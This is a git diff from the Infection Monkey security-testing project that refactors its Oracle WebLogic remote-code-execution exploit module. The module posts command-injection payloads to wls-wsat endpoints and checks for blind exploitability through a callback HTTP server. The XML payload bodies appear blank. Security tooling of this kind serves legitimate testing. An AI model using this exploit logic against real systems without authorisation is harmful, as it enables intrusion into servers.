diff --git a/infection_monkey/config.py b/infection_monkey/config.py
index b5df92f55..f8094817c 100644
--- a/infection_monkey/config.py
+++ b/infection_monkey/config.py
@@ -191,7 +191,8 @@ class Configuration(object):
# TCP Scanner
HTTP_PORTS = [80, 8080, 443,
- 8008, 7001 # HTTP alternate
+ 8008, # HTTP alternate
+ 7001 # Oracle Weblogic default server port
]
tcp_target_ports = [22,
2222,
diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py
index bd6cbc777..4169bb537 100644
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@@ -17,11 +17,11 @@ import logging
__author__ = "VakarisZ"
LOG = logging.getLogger(__name__)
-# How long server waits for get request
+# How long server waits for get request in seconds
SERVER_TIMEOUT = 4
-# How long to wait for a request to go to vuln machine and then to our server from there
+# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
REQUEST_TIMEOUT = 2
-# How long to wait for response in exploitation
+# How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15
URLS = ["/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
@@ -55,40 +55,10 @@ class WebLogicExploiter(WebRCE):
return exploit_config
def exploit(self, url, command):
- empty_payload = '''
-
-
-
-
-
-
-
-
-
- '''
if 'linux' in self.host.os['type']:
- cmd_base = '/bin/sh'
- cmd_opt = '-c'
- command += ' 1> /dev/null 2> /dev/null'
+ payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
else:
- cmd_base = 'cmd'
- cmd_opt = '/c'
- command += ' 1> NUL 2> NUL'
-
- payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+ payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e:
@@ -96,7 +66,7 @@ class WebLogicExploiter(WebRCE):
print(e)
return True
- class HTTPServer(threading.Thread):
+ class IndicationHTTPServer(threading.Thread):
"""
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
@@ -109,6 +79,7 @@ class WebLogicExploiter(WebRCE):
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
+ self.daemon = True
def run(self):
class S(BaseHTTPRequestHandler):
@@ -132,43 +103,81 @@ class WebLogicExploiter(WebRCE):
def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock
- lock = threading.Lock()
- local_port = get_free_tcp_port()
- local_ip = get_interface_to_target(self.host.ip_addr)
- httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
- httpd.daemon = True
- lock.acquire()
- httpd.start()
- lock.acquire()
- generic_check_payload = '''
-
-
-
-
- http://{lhost}:{lport}
-
-
-
-
-
-
-
-
-
- '''
- payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
+ httpd, lock = self._start_http_server()
+ payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
except exceptions.ReadTimeout:
+ # Our request does not get response thus we get ReadTimeout error
pass
except Exception as e:
LOG.error("Something went wrong: %s" % e)
+ self._stop_http_server(httpd, lock)
+ return httpd.get_requests > 0
+ def _start_http_server(self):
+ lock = threading.Lock()
+ local_port = get_free_tcp_port()
+ local_ip = get_interface_to_target(self.host.ip_addr)
+ httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
+ lock.acquire()
+ httpd.start()
+ lock.acquire()
+ return httpd, lock
+
+ def _stop_http_server(self, httpd, lock):
lock.release()
httpd.join(SERVER_TIMEOUT)
httpd.stop()
- if httpd.get_requests > 0:
- exploited = True
- else:
- exploited = False
- return exploited
+ return True
+
+
+ @staticmethod
+ def exploit_payload(cmd_base, cmd_opt, command):
+ empty_payload = '''
+
+
+
+
+
+
+
+
+
+ '''
+ payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+ return payload
+
+ @staticmethod
+ def test_payload(ip, port):
+ generic_check_payload = '''
+
+
+
+
+ http://{host}:{port}
+
+
+
+
+
+
+
+
+
+ '''
+ payload = generic_check_payload.format(host=ip, port=port)
+ return payload